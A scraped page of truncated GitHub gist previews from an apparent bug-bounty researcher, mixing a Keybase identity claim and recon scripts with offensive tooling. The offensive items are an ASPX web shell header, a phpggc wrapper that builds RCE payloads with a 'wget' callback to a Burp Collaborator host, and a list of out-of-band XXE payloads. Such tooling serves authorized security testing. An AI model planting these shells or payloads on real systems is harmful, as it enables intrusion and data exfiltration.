I hereby claim:
- I am honoki on github.
- I am honoki (https://keybase.io/honoki) on keybase.
- I have a public key ASAeJaTSXX2WEDxNZf5QSkh-Rg_hl16ncJgcuW14Aba7Two
To claim this, I am signing this object:
# see https://espanso.org/ for more info | |
matches: | |
# base64 encode whatever's on your clipboard | |
- trigger: ":be" | |
replace: "{{output}}" | |
vars: | |
- name: "clipb" | |
type: "clipboard" | |
- name: output | |
type: shell |
I hereby claim:
To claim this, I am signing this object:
<%@ Page Language="VB" Debug="true" %> | |
<%@ import Namespace="system.IO" %> | |
<%@ import Namespace="System.Diagnostics" %> | |
<!-- sources: https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx --> | |
<% | |
Response.Write("Executing code.") |
#!/bin/bash | |
# Update the scope of your HackerOne programs | |
h1name="<your-hackerone-username>" | |
apitoken="<your-hackerone-api-token>" | |
next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100' | |
for p in $(bbrf programs where platform is hackerone --show-empty-scope); do | |
h1id=$(bbrf show $p | jq -r .tags.h1id) |
#!/bin/bash | |
# Initiate new BBRF programs from your public and private HackerOne programs | |
h1name="<your-hackerone-username>" | |
apitoken="<your-hackerone-api-token>" | |
next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100' | |
while [ "$next" ]; do |
#!/bin/bash | |
# phpggc wrapper that automatically generates payloads for RCE gadgets | |
function="system" | |
command="wget http://your.burpcollaborator.net/?" | |
# modify the options below depending on your use case | |
options="-a -b -u -f" | |
# generate gadget chains |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
#!/usr/bin/python3 | |
import requests | |
def is_blacklisted(domain): | |
blacklist = open("/path/to/blacklist.txt") | |
return domain in [w.strip() for w in blacklist.readlines()] | |
def request(flow): | |
req = flow.request.method + ' ' + flow.request.path + ' ' + flow.request.http_version + '\n' |
import time | |
import requests | |
def is_blacklisted(domain): | |
blacklist = open("blacklist.txt") | |
return domain in [w.strip() for w in blacklist.readlines()] | |
# Avoid Slack expanding your links by replacing the last dot. | |
def escape_domain(domain): | |
return domain.replace('yourdomain.com', 'yourdomain[.]com') |